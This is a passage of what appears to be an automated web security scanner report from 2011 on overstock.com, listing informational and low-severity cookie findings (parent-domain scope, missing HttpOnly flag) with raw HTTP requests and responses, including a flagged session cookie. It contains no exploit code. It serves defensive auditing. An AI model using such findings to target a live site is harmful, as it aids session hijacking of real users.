Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:39 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124038


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- end SITE-DOCYTPE -->
<html>
<head>

<!--Page-specific title and meta data-->
<title>Overstock.com
...[SNIP]...

2.19. http://www.overstock.com/intlcountryselect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /intlcountryselect

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intlcountryselect HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:41 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clubogiftcards=; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 180841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.co
...[SNIP]...

2.20. http://www.overstock.com/myrecommendations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /myrecommendations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myrecommendations HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:39 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:39 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:39 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 46411


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->
<html>
<head>
<!--Page-specific
...[SNIP]...

2.21. http://www.overstock.com/shipping-information/11971/static.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /shipping-information/11971/static.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shipping-information/11971/static.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:41 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 1108421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->

<!--Page-specific title and meta data-->
<title>Shippin
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 21 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.overstock.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; mxclastvisit=20110203

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:15:12 GMT
Server: Apache
Set-Cookie: SSLB=A; path=/; domain=www.overstock.com
Set-Cookie: SSID=AwAXDSkAAAAAELJWTQxpBgUQslZNAQAQslZNAAAAAAAAAAAQslZNAQDsAAAAhg4AAAI; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:15:12 GMT
Set-Cookie: SSSC=2.G5572837370791094540.1.236.3718; path=/; domain=www.overstock.com
Set-Cookie: SSRT=ELJWTQE; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:15:12 GMT
Vary: Cookie,Accept-Encoding,User-Agent
Expires: Thu, 20 May 2010 20:51:00 GMT
Pragma: no-cache
Encoding: iso-8859-1
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: se_list=se_list^0|4|; Domain=.overstock.com; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527312838|csbshow^0|mxcshopmore^http://www.overstock.com/; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1297527312839; Domain=.overstock.com; Path=/
Set-Cookie: clubogiftcards=clubogctotal^0.00; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:15:12 GMT; Path=/
Sitespect: true
Content-Length: 89639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- end SITE-DOCYTPE -->
<html>
   <head>
<!-- // --><script language='javascript' type='text/ja
...[SNIP]...

3.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html?IID=prod5072802&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:12 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:12 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:12 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:12 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 133008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html?IID=prod5213639&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:07 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:07 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:07 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:07 GMT; Path=/
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128413

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.4. http://www.overstock.com/Home-Garden/1/store.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/1/store.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/1/store.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:43 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/1/store.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:43 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 272482

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.5. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Bedding-Bath/1/dept.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Bedding-Bath/1/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:44 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Bedding-Bath/1/dept.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 285996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?IID=prod4068266&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:47 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.7. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?IID=prod5203264&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:31:32 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:31:32 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:32 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:32 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
